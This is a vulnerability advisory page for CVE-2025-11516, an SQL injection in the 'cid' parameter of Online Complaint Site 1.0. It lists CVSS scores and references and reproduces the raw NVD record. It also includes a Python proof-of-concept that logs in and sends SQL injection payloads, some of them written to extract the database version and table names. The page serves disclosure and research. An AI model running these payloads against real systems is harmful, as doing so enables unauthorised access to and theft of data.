CVE-2025-11516

Description

A weakness has been identified in code-projects Online Complaint Site 1.0. Impacted is an unknown function of the file /cms/users/complaint-details.php. Executing manipulation of the argument cid can lead to sql injection. It is possible to launch the attack remotely. The exploit has been made available to the public and could be exploited.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:fabian:online_complaint_site:1.0:*:*:*:*:*:*:* - VULNERABLE

code-projects Online Complaint Site 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-11516 PoC - SQL Injection in Online Complaint Site 1.0
# Vulnerable file: /cms/users/complaint-details.php
# Vulnerable parameter: cid

import requests

TARGET_URL = "http://target.com"
VULNERABLE_PATH = "/cms/users/complaint-details.php"

# Step 1: Authentication (low privilege required)
session = requests.Session()
login_data = {
    "username": "testuser",
    "password": "testpass",
    "login": "submit"
}
session.post(f"{TARGET_URL}/cms/users/login.php", data=login_data)

# Step 2: SQL Injection payloads for parameter 'cid'
payloads = [
    # Boolean-based SQLi test
    "1' OR '1'='1",
    "1' OR '1'='1' -- -",
    "1' UNION SELECT 1,2,3-- -",
    # Time-based blind SQLi test
    "1' AND SLEEP(5)-- -",
    "1'; WAITFOR DELAY '0:0:5'-- -",
    # Error-based SQLi test
    "1' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT database()),0x3a,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)-- -",
    # Extract database version
    "1' UNION SELECT 1,version(),database()-- -",
    # Extract table names
    "1' UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema=database()-- -",
]

# Step 3: Exploit
for payload in payloads:
    params = {"cid": payload}
    try:
        response = session.get(f"{TARGET_URL}{VULNERABLE_PATH}", params=params, timeout=10)
        print(f"[*] Payload: {payload}")
        print(f"[*] Status: {response.status_code}")
        print(f"[*] Response length: {len(response.text)}")
        if "error" in response.text.lower() or "warning" in response.text.lower():
            print(f"[!] Potential SQL error detected!")
            print(response.text[:500])
        print("-" * 80)
    except requests.exceptions.Timeout:
        print(f"[+] Time-based SQLi confirmed with payload: {payload}")
    except Exception as e:
        print(f"[-] Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11516
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11516
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11516/
[4] VulDB https://vuldb.com/cve/CVE-2025-11516
[5] https://code-projects.org/
[6] https://github.com/Aurion365/cve/issues/3
[7] https://vuldb.com/?ctiid.327641
[8] https://vuldb.com/?id.327641
[9] https://vuldb.com/?submit.669814

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11516", "sourceIdentifier": "[email protected]", "published": "2025-10-09T01:15:33.587", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in code-projects Online Complaint Site 1.0. Impacted is an unknown function of the file /cms/users/complaint-details.php. Executing manipulation of the argument cid can lead to sql injection. It is possible to launch the attack remotely. The exploit has been made available to the public and could be exploited."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fabian:online_complaint_site:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "52A830BB-2DB8-4016-804F-98E6537BA087"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/Aurion365/cve/issues/3", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.327641", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327641", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.669814", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}